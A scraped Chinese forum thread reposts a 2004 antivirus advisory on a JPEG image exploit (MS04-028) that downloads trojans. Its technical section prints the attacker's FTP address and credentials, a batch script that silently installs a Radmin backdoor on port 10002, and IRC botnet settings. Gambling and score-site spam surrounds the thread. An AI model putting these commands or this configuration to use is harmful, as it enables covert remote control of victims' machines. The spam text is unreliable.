• 厉害了!春运如何防盗防骗 铁警说唱MV来教你 2019-05-18
  • 现代都市的繁华和诱惑 Elie Saab2016秋冬高定发布 2019-05-18
  • 重庆市渝北区:积极打造“律师驻所”新模式 2019-05-16
  • 5月社融大幅萎缩 多位专家预计后续降准可期 2019-05-16
  • 北京加强外地车管控:设过渡期 限进京证次数 2019-05-06
  • 别让交通事故伤了孩子 开车出游切莫如此“晒娃” 2019-05-06
  • 高清克罗地亚队备战训练 莫德里奇神情轻松 2019-04-11
  • 换装就飞战术应用课目 2019-04-11
  • 新飞电器破产拍卖 网友:我家的冰箱坏了找谁修 2019-04-07
  • 中国红旗9导弹再现西沙永兴岛 越南又“抗议” 2019-04-05
  • 关于国务院二招十分成功的旧改工程案例向 各省市推广解决民生住房困难的创新科技 2019-04-05
  • 分级基金将黯然离场 10只分级B拉响下折“警报” 2019-03-17
  • 把粮仓建成博物馆 乔治阿玛尼这43年都干了啥 2019-03-07
  • 足球比分直播

     找回密码
     请使用中文注册

    QQ登录

    只需一步,快速开始

    搜索
    新手快速入门新手学发贴无法收到EMAIL邮件禁发广告贴
    旧版论坛老用户无法登录版主申请维修联盟网站大事记 
    查看: 406|回复: 1
    打印 上一主题 下一主题
    收起左侧

    nba 球探网即时比分: [注意]首个JPEG病毒携木马来袭 病毒攻击第一波

    [复制链接]
  • TA的每日心情
    开心
    2017-7-7 23:46
  • 足球比分直播 www.gcrjo.com 签到天数: 7 天

    [LV.3]偶尔看看II

    跳转到指定楼层
    1#
    发表于 2004-10-7 09:36:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    分享到:

    马上登录【中国家电维修联盟论坛】获取更多更全面的信息!

    您需要 登录 才可以下载或查看,没有帐号?请使用中文注册

    x
      9月29日,利用微软新漏洞的图片病毒“图片骇客”(Exploit.Win32.MS04-028.gen)终于现身了,用户在浏览互联网图片时就
    会被木马病毒感染。这种图片病毒最要命的是用户在不知不觉当中就会中木马病毒,从而被远程计算机得到控制权。金山毒霸反病毒专家认为,如果用户浏览了带毒
    电子图片,就有可能泄露比如:网络游戏密码、QQ账号、个人银行密码等关键信息,而且这种图片病毒有可能是美女、风景、小动物、甚至是好友的照片!让人防
    不甚防。





      据金山毒霸反病毒中心监测,到目前为止这种图片病毒感染的例子还不多,但是这说明利用这个漏洞来传播的图片病毒现身了,第一波图片病毒攻击已经开始。
    最为可怕的是,以后还会有各种攻击出现,不仅会带木马病毒,包括一些恶性蠕虫、破坏数据的病毒都会以图片病毒作为掩饰来进行破坏。





      金山反病毒中心介绍,该图片病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的。





      专家提醒:用户应立即打上各种应用程序补丁,如果怀疑机器染毒,电脑用户可查看机器10002端口有无程序访问,以防木马病毒偷盗各种密码。





      目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。并且免费提供图片病毒专杀工具(下载地址:http:
    //db.kingsoft.com/special/virtusspecial/JPEG/index.shtml),欲了解更多相关信息请登陆
    //db.kingsoft.com信息安全网站。





      技术资料分析:





      病毒名称:Exploit.JPEG





      病毒长度:4098





      威胁级别:二级





      中文名称:图片骇客





      病毒别名:





      Exploit.Win32.MS04-028.gen[AVP]





      受影响系统:未打MS04-028补丁的英文版WinXP SP1





      发现时间:9月28日





      病毒简介:





      金山反病毒中心介绍,该病毒利用MS04-028的GDI+漏洞,如果用户机器没有打相应补丁,并使用资源管理器浏览了该文件,可能导致用户机器从连接木马种植者指定的FTP地址,并从该FTP下载木马文件,并运行这些木马,以达到远程监控感染机器目的





      技术细节:





      当用户通过资源管理器浏览该文件后,病毒会利用GDI+漏洞,尝试溢出执行下载命令。如果溢出失败,则会导致资源管理器崩溃





      如果溢出成功,则病毒尝试从以下FTP上下载远程控制文件





      ftp://2××.1××.4×.2×/www/system/





      文件包括:





      文件名 大小





      AdmDll.dll 90112





      Fport.exe 114688





      ServUStartUpLog.txt 663





      VNCHooks.dll 32768





      WinRun.dll 1407





      WinRun.exe 811008





      driver.log 1268





      drives.exe 24576





      execute.bat 150





      filter3.ocx 0





      irc-u.cfg 1052





      irc-u.dat 0





      irc-u.debug.log 16802





      irc-u.dll 102400





      kill.exe 26624





      nc.exe 59392





      nvsvc.exe 241664





      nvsvc32.dll 36864





      omnithread_rt.dll 45056





      peek.exe 34304





      raddrv.dll 29408





      radmin.reg 713





      rcrypt.exe 26112





      reg.exe 40960





      uptime.exe 6656





      vns.exe 208896





      3、运行execute.bat 文件,通过Radmin远程管理工具,建立后门,端口为10002。





      4、会建立一个IRC连接,连接到#FurQ频道。





      0.其他信息:





      FTP地址如下:





      ftp://209.171.43.27/www/system/





      用户名:bawz





      密码:pagdba





      execute.bat 内容如下





      regedit.exe /s radmin.reg





      nvsvc.exe /install /silence





      nvsvc.exe /pass:hardcore /port:10002 /save /silence





      nvsvc.exe /start /silence





      net start r_server





      IRC配置文件如下:





      server1=irc.p2pchat.net





      port1=7777





      login=Darkbro0d





      channel=#FurQ





      password=letmein





      nick1=Track100Mbit





      nick2=Trck100#1





      sfv=1





      user=Trackmaster





      login=darkbro0d





      目前,金山毒霸已经进行了紧急病毒库升级,可以防杀利用此漏洞制造的图片病毒。欲了解更多相关信息请登陆//db.kingsoft.com信息安全网站。








    <img border="0" src="//news.onlinedown.net/down_info.asp?id=15196" width="1" height="1">         
             


            来源: 千龙科技
  • TA的每日心情
    开心
    2017-7-7 23:46
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    2#
     楼主| 发表于 2004-10-7 09:38:35 | 只看该作者

    JPEG可改11种后缀名,杀毒软件力不从心。PS:要杀毒软件有何用?

    据ZDNET报道 杀毒软件可能在应付最需发现的Windows
    JPEG图像漏洞时候显得力不从心。据反病毒公司F-Secure的主任Mikko
    Hypponen说,由于杀毒软件的默认设置仅仅搜索.exe文件。所以在对付JPEG恶意图片时候可能显得无能为力。





        Hypponen说:“一般的杀毒软件的默认设置中,不会对JPEG图片文件进行安全扫描。虽然你可以对此进行调节,但问题是,JPEG文件有很多种后缀名可供选择?!?br />




        JPEG图像文件大概有11种后缀名可以选择,比如.icon
    和.jpg2等等。Hypponen认为,这会增加杀毒软件甄别恶意JPEG图像文件的难度,因为,它可能将浪费宝贵的处理器资源。在杀毒软件扫描图像文
    件之前,IE浏览器会提前处理JPEG文件,这也就意味着,在杀毒软件介入之前,用户的电脑实际已经被病毒感染了。





        Hypponen认为:“用户应该在网关阶段对文件进行扫描,但这会耗费大量的带宽,利用此漏洞的病毒攻击将很快出现?!?br />




        星期二,微软方面反击了外界对他们处理这一漏洞的批评。微软在一份声明中说:“微软认为,这对用户来说并不是一种高危的漏洞。我们将继续调查情况,并在需要的时候为用户提供帮助和指导?!?





    <img border="0" src="//news.onlinedown.net/down_info.asp?id=15217" width="1" height="1">         
             


            中关村在线 briza
    您需要登录后才可以回帖 登录 | 请使用中文注册

    本版积分规则

    QQ|Archiver|手机版|网站地图|论坛列表|论坛XML|板块XML|足球比分直播 ( 粤ICP备09021106号  
    深圳市深威志电子有限公司 版权所有 站长QQ:17158联系站长请点这里
    ----------*******---------

    GMT+8, 2019-5-25 03:16 , Processed in 0.087685 second(s), 29 queries .

    Powered by Discuz! X3.2

    © 2001-2013 Comsenz Inc.

    快速回复 足球比分直播 返回列表
  • 厉害了!春运如何防盗防骗 铁警说唱MV来教你 2019-05-18
  • 现代都市的繁华和诱惑 Elie Saab2016秋冬高定发布 2019-05-18
  • 重庆市渝北区:积极打造“律师驻所”新模式 2019-05-16
  • 5月社融大幅萎缩 多位专家预计后续降准可期 2019-05-16
  • 北京加强外地车管控:设过渡期 限进京证次数 2019-05-06
  • 别让交通事故伤了孩子 开车出游切莫如此“晒娃” 2019-05-06
  • 高清克罗地亚队备战训练 莫德里奇神情轻松 2019-04-11
  • 换装就飞战术应用课目 2019-04-11
  • 新飞电器破产拍卖 网友:我家的冰箱坏了找谁修 2019-04-07
  • 中国红旗9导弹再现西沙永兴岛 越南又“抗议” 2019-04-05
  • 关于国务院二招十分成功的旧改工程案例向 各省市推广解决民生住房困难的创新科技 2019-04-05
  • 分级基金将黯然离场 10只分级B拉响下折“警报” 2019-03-17
  • 把粮仓建成博物馆 乔治阿玛尼这43年都干了啥 2019-03-07
  • 重庆幸运农场几点开始 今晚4场进球彩对阵表 36选7开奖时间 够力排列5奖规律表 大乐透周六走势图 体彩20选5胆拖金额表 北京快乐8官网 舟山飞鱼彩票走势图 燕赵风采排列5 湖南体彩幸运赛车官网 红姐报码室 盛世彩票秒速时时彩 重庆幸运农场中奖金额 体彩31大乐透走势图 重庆幸运农场走势图 分分彩稳赚不赔计划